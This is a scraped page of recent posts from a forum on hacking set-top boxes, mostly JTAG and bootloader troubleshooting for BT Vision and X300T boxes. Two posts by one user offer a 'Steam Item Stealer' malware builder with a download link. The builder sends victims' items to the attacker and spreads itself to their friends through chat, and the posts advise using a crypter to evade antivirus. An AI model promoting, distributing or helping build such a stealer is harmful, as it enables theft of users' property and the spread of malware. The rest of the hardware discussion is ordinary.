11. Dec 2023, 09:13

Recent Posts

Pages: 1 [2] 3 4 ... 10
Sonstiges / Re: wiki down ?
Last post by krobo - 24. Jan 2015, 23:04
Wiki wieder gestört ??!!
Hardware / Re: DIT7421/05 SMP8634LF REV-C...
Last post by aks - 31. Dec 2014, 20:13

Hi aks,
I realise that this is an old post but I have done the same thing and come to the same conclusion that JTAG-Enable TCK and TMS all run to ground.
Taking this a step further and in the hope of being able repair this by cutting a few traces I decided to remove the chip from a second board and proceeded map each JTAG wire from the top of the chip to the balls underneath (unfortunately I could not find a datasheet for this chip and spent hours with a sewing needle taped to my multi-meter probe)
The result were as follows
JTAG-Enable TCK and TMS are attached to each other beneath the chip and then to ground
TDO is not attached to anything
TRST_N can be found on the bottom of the board beneath the chip
TDI can be found on the top of the board to the right of the chip
I think it is therefore safe to say that this box cannot be modified. (please prove me wrong)
The attached picture shows the pin outs on the SMP8634LF chip and also traces connecting JTAG-Enable TCK and TMS

Hi darcy
apologies for the late response ! been distracted by child rearing unfortunately - guess things have moved on to other boards by now.
your disassembly looks conclusive to me  - i dont think theres any way to get to those signals with the chip attached to the pcb unless you can add some tracks and then reattach your smp. out of scope for my soldering iron !

Software / Re: BT Vision 2.0 Black Box li...
Last post by oscar - 09. Dec 2014, 18:50

Hello, Is there anybody in there? Just nod if you can hear me Is there anyone home !!

Picked up another of these boxes today  --- this one boots up with a different screen and works as a Freeview box.
The menu looks different.
Is there any way of sniffing the software off this one and using it in the other one?
Is this info on the hard drive or written into the board?
I haven't tried swapping the hard drives over to see if it will make the bad one work.

Any help appreciated --- even if you read this please just reply with a hello !!

whoops, sorry for the delay. From how I understand the BTvision box works the new firmware is downloaded and written to the box itself, its not stored on the hard drive so there is no way to copy it.

Now it's my turn to apologise !!
Thanks for the info ....
Software / Re: Steam Item Stealer
Last post by SempreFi - 02. Dec 2014, 20:19
Stealer updated, chat spreader is now  working !
Software / Steam Item Stealer
Last post by SempreFi - 29. Nov 2014, 14:58
Hey guys.
I'm new here so I want to share some of my knowledge.
I am releasing a free steam stealer so you do not have to spend $50 on them anymore!

I reverse engineered some Russian malware and created a builder out of it for members of HackForums to use!

-Enter your Steam64, OfferID, and OfferToken to recieve items
-Custom message that will send to all contacts on the steam friends list
-Not FUD, however most steam stealers that say they are FUD might just be detected at runtime which is why they do not get good results. I do recommend a crypter which will make this undetected.
-This builder is extremely simple and took around 5 minutes to make, please give feed back on what you think of this software!

Download link: https://mega.co.nz/#!cMgxkaTB!FzVdg43wuR6eiIdK0boV3ifgs8gUv54zNwNO0LlJAds
If you are afraid of download, just test with sandiebox.

Any problems or questions just pm me !

[img link=]http://i.imgur.com/luLzbHF.jpg[/img]
Hardware / Replacing HDD in X301T
Last post by iqlogic - 14. Sep 2014, 08:01
Hello friends,

please, could you tell me if there is any change to replace original HDD in X301T? Original one is very noisy  :(
And another question. Can I use some SATA-to-IDE converter? I have some spare SATA HDD so I would use it.

Many many thanks guys  ;)
Hardware / Re: HOW TO
Last post by inside4ndroid - 27. Jul 2014, 14:49
hi everyone i am new here as i have just aquired a BT Vision PACE DIT7431/05 with the bt vision card still in it although i do not have bt broadband and never will.. sooo i would like to hop on board and blow this little box apart :)

i have extensive experiance in jtagging xbox360's and mobile phones but i have never done a box like this before.. i have done a lot of reading but i am still a little confused on how to get the ATMEGA8 chip hooked up?? i have the pdf from the first post although that pcb board is different to my box?

i have found this image which is0-mick here on the forums has kindly made available..

could someone help me with connecting this up to the chip and jtag ltp port?

thanks in advance..
Software / Re: Bootloader Patcher
Last post by Irgendjemand - 26. Jul 2014, 19:55
Ich hatte von einem Kollegen eine defekte X300T bekommen, welche ich durch den Tausch zweier Elkos wieder reparieren konnte.
Ich musste jedoch feststellen, dass sich diese unmodifiziert nicht sinnvoll nutzen lässt und fände es Schade, wenn diese trotz RaspberryPI, etc. noch interessante Box auf dem Müll landen würde.
So hatte ich den JTAG-Adapter mit 74HC244 aus dem Wiki nachgebaut und LX.bin sowie YA.bin auf die erste Partition der Festplatte kopiert.
Außerdem habe ich eine Box ohne herausgeführter JTAG_ENABLE Leitung, sodass ich auf dem Prozessor löten musste (Rev 0J).
Dies scheint soweit funktioniert zu haben, da ich zwischen GND und dem angelöteten Draht die Diodenstrecke einer ESD-Schutzdiode des Prozessors messen konnte.
Den Draht habe ich mit dem JTAG_ENABLE-Jumper verbunden, welchen ich zusätzlich gebrückt habe.
Des weiteren hatte ich noch über den Trick mit der OK-Taste die "Internet OK?"-Meldung provoziert.
Wenn ich jedoch versuche mit dem Bootloader Patchtool ein Alternatives Bootimage zu starten, wird offenbar zwar der Chip erkannt, der Controller kann jedoch nicht in den Debug Modus versetzt werden und das Tool bleibt daraufhin mit der Meldung "Clearing Watchdog" hängen. Die Ausgabe einer Meldung über den Videoausgang der Box stoppt mit dem Ausführen des Tools.
Der Bootloader Patcher liefert die folgende Ausgabe:
Code: [Select]

C:\User\me\files\X300tpatch3>X300tpatch3.exe /yamon /wiggler

X300t bootloader patcher v3.0  by MCE2222 / Robert_S
based on WRT54G/GS EJTAG Debrick Utility which
is actually derived from Mips32 EJTAG from
TotalEmbedded without giving credit... ts ts ts
= This version only works on bootloader V1053,V1051,V1039 =

USAGE: x300tpatch
            /wiggler ........... use wiggler cable

            /linux ............. boot LX.BIN

            /yamon ............. boot YA.BIN


starting YA.BIN

using Wiggler interface
Probing bus ... Done

CPU Chip ID: 00001000011000110000000000000001 (08630001)
*** Found a SigmaDesigns SMP8634 Rev A CPU chip ***

Issuing Processor / Peripheral Reset ... Done
Halting Processor ... <Processor did NOT enter Debug Mode!> ... Done
Clearing Watchdog ...

Auf dem seriellen Port der Box sind dabei auch keine neuen Meldungen zu erkennen:
Code: [Select]

<\0>xosPee serial#3713163027ffa953af755f8f350b17f4 subid 0xc4
xenv cs2 ok
power supply: ok
dram0 ok (8)
dram1 ok (8)
zboot (0) ok

Microsoft IPTV Bootloader, Build (1051)
Built by BM-DELL-167, Sep 11 2006 16:54:12

Ich hatte auchschon das einfache JTAG-Kable mit vier 100 Ohm Widerständen probiert, welches jedoch überhaupt nicht funktioniert, da irgendjemand gemeint hatte, dass er bei der komplexeren Schaltung Probleme mit einer Masseschleife hatte. Mir sah es jedoch eher danach aus, als ob der VIO-Pin nicht belastbar genug ist um den 74HC244 zu versorgen, sodass ich diesen bei meinen Tests extern versorgte.

Irgendjemand hier im Forum hatte auch gemeint, es gäbe neuere Firmware Versionen, welche das JTAG-Interface per Software deaktivieren könnten. Könnte dies eventuell bei meiner Box der Fall sein? Gibt er hierüber nähre Informationen, was wäre dann zu tun?

Hat sonst noch jemand eine Idee weshalb ich die genannten Probleme beim Patchen haben könnte?
WinCE / Re: tv2remotekeys ?
Last post by VisionUser - 17. Jul 2014, 21:18

Well, that's easy... According to http://msdn.microsoft.com/en-us/library/aa453696.aspx the folder for MIPS CPUs is 4000...

The problem is... I'm quite sure the autorun functionality is implemented by the Windows shell (explorer.exe or whatever they use on Windows Mobile)

And the STB isn't running the shell :)

When a USB flash drive is plugged into the box before boot up, the box will access the flash drive 2 times early on during the boot up process. The question is, what file is it looking for on the USB flash drive? Could it be looking for a firmware update or a file to execute?
Pages: 1 [2] 3 4 ... 10